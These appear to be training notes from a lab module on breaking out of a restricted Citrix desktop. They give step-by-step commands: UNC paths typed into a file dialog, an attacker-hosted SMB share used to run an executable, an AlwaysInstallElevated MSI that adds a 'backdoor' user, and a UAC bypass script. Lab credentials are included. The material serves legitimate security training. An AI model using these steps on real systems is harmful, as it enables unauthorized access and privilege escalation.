22.-Citrix-breakout

Ubuntu (SMB Server)

smbserver.py -smb2support share $(pwd)

Windows (Citrix Breakout)

# Dialog Box Navigation (MS Paint)
\\127.0.0.1\c$\users\pmorgan
\\10.13.38.95\share

# Execute pwn.exe (Right-click and Open)

Privilege Escalation (PowerUp)

Import-Module .\PowerUp.ps1
Write-UserAddMSI

Privilege Escalation (Registry Query)

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Run as New User

runas /user:backdoor cmd

UAC Bypass

Import-Module .\Bypass-UAC.ps1
Bypass-UAC -Method UacMethodSysprep

Verify Privileges

whoami /all
whoami /priv

1. Initial Access & Environment Reconnaissance

  • Login to http://humongousretail.com/remote/ with credentials:

    • Username: pmorgan

    • Password: Summer1Summer!

    • Domain: htb.local

  • Download launch.ica and connect to the Citrix environment.

  • Observe File Explorer restrictions.

2. Bypassing Path Restrictions (Dialog Box Exploitation)

  • Open a Dialog Box:

    • Run MS Paint.

    • File > Open.

  • Navigate using UNC Path:

    • In the "File name" field, enter \\127.0.0.1\c$\users\pmorgan.

    • Set "File-Type" to "All Files".

    • Press Enter.

3. Accessing SMB Shares from Restricted Environments

  • Start SMB Server (Ubuntu):

    • root@ubuntu:/home/htb-student/Tools# smbserver.py -smb2support share $(pwd)

  • Access SMB Share (Citrix):

    • Open MS Paint Dialog Box.

    • Enter \\10.13.38.95\share (replace with your Ubuntu server's IP).

    • Set "File-Type" to "All Files".

    • Press Enter.

  • Execute pwn.exe (Command Execution):

    • Right click pwn.exe, and open it.

  • Copy files from SMB to local directory:

    • Use the new cmd window that pwn.exe created.

4. Alternate Tools for Bypassing Restrictions

  • Alternate File Explorers:

    • Use Q-Dir or Explorer++ to bypass File Explorer restrictions.

    • Copy files using Explorer++ from the network share.

  • Alternate Registry Editors:

    • Use Simpleregedit, Uberregedit, or SmallRegistryEditor to bypass registry editor restrictions.

  • Modify Shortcut Files:

    • Right-click shortcut > Properties.

    • Modify "Target" to desired executable path.

    • Execute the modified shortcut.

  • Script Execution:

    • Create evil.bat with cmd inside.

    • Execute evil.bat.

5. Privilege Escalation

  • Check AlwaysInstallElevated:

    • PowerShell: Import-Module .\PowerUp.ps1

    • Cmd: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

    • Cmd: reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

  • Create MSI for User Addition (PowerUp):

    • PowerShell: Write-UserAddMSI

  • Execute MSI and Create User:

    • Run UserAdd.msi.

    • Create user (e.g., backdoor:T3st@123).

  • Run Commands as New User:

    • Cmd: runas /user:backdoor cmd

6. UAC Bypass

  • Import UAC Bypass Script:

    • PowerShell: Import-Module .\Bypass-UAC.ps1

  • Execute UAC Bypass:

    • PowerShell: Bypass-UAC -Method UacMethodSysprep

  • Verify Elevated Privileges:

    • PowerShell: whoami /all or whoami /priv

    • Access C:\Users\Administrator

Key Commands and Actions:

  • smbserver.py -smb2support share $(pwd) (Ubuntu)

  • reg query ... (Cmd)

  • Import-Module ... (PowerShell)

  • Write-UserAddMSI (PowerShell)

  • runas /user:... cmd (Cmd)

  • Bypass-UAC -Method ... (PowerShell)

  • whoami /all (PowerShell/Cmd)

  • whoami /priv (PowerShell/Cmd)

Previous6.Restricted EnvironmentsNext7.Additional Techniques

Last updated